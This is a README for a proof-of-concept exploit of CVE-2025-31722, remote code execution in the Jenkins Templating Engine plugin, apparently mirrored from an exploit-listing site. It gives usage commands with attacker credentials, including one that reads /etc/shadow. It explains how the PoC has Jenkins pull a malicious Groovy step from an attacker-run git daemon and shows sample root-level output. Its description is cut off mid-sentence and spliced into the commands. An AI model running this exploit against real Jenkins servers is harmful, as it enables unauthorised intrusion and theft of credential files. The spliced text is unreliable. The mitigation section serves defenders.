Exploit for Code Injection in Jenkins Templating_Engine CVE-2025-31722

## https://sploitus.com/exploit?id=3D7DEF72-A21C-551F-A718-7039AC1FD5C2
# CVE-2025-31722 — Jenkins Templating Engine RCE

> **For educational and authorized security research purposes only.**


## Description

Sandbox bypass vulnerability in the **Jenkins Templating Engine (JTE) plugin :8080 \
  --user attacker \
  --pass attacker123 \
  --git-host 
```

### Custom command

```bash
python3 exploit.py \
  --url http://:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host  \
  --cmd "cat /etc/shadow"
```

### Cleanup

```bash
python3 exploit.py \
  --url http://:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host  \
  --cleanup
```

### Parameters

| Parameter | Description | Required |
|-----------|-------------|----------|
| `--url` | Jenkins base URL | Yes |
| `--user` | User with Item/CREATE+CONFIGURE+BUILD permissions | Yes |
| `--pass` | User password | Yes |
| `--git-host` | Kali IP reachable from Jenkins | Yes |
| `--cmd` | Command to execute on the server (default: `id && hostname && cat /etc/passwd`) | No |
| `--cleanup` | Deletes the folder, job and repo created by the exploit | No |

---

## How the PoC Works

1. **`setup_repo()`** — Creates `~/jte-exploit/evil-lib/steps/evil.groovy` on Kali with the command to execute
2. **`start_git_daemon()`** — Starts `git daemon` on Kali on port 9418
3. **`create_folder()`** — Creates a folder in Jenkins with a `GovernanceTier` pointing to `git://KALI:9418/jte-exploit`
4. **`create_job()`** — Creates a job with `AdHocTemplateFlowDefinition` that declares `evil-lib` and calls `evil()`
5. **`trigger_and_wait()`** — Triggers the build and waits for the result
6. **`print_output()`** — Displays the console output with the RCE result

The git daemon stays alive throughout the entire build cycle and is terminated automatically once the build completes.

---

## Expected Output

```
=================================================================
  CVE-2025-31722 — Jenkins Templating Engine RCE
  Target  : http://10.211.55.10:8080
  Git host: 10.211.55.7
  Command : id && hostname && cat /etc/passwd
=================================================================

[+] Authenticated as: attacker (id=attacker)
[+] Repo created: /root/jte-exploit
[+] Malicious step: evil-lib/steps/evil.groovy
[+] Git daemon running at git://10.211.55.7:9418/jte-exploit
[+] Folder created
[+] Job created
[+] Build queued

=================================================================
  CVE-2025-31722 — RCE OUTPUT
=================================================================
[JTE] ...
uid=0(root) gid=0(root) groups=0(root)
debian
root:x:0:0:root:/root:/bin/bash
...
=================================================================
```

---

## Mitigation

- Update the Templating Engine plugin to version **2.5.4 or later**
- Restrict `Item/CREATE` and `Item/CONFIGURE` permissions to trusted users only
- Enable CSRF protection in Jenkins
- Audit folders with `GovernanceTier` configurations pointing to external repositories

---

## References

- [Jenkins Security Advisory](https://www.jenkins.io/security/advisories/)
- [JTE Plugin GitHub](https://github.com/jenkinsci/templating-engine-plugin)

---

> **Legal disclaimer:** This PoC is intended solely for educational purposes and testing in controlled environments. Using it against systems without explicit authorization is illegal.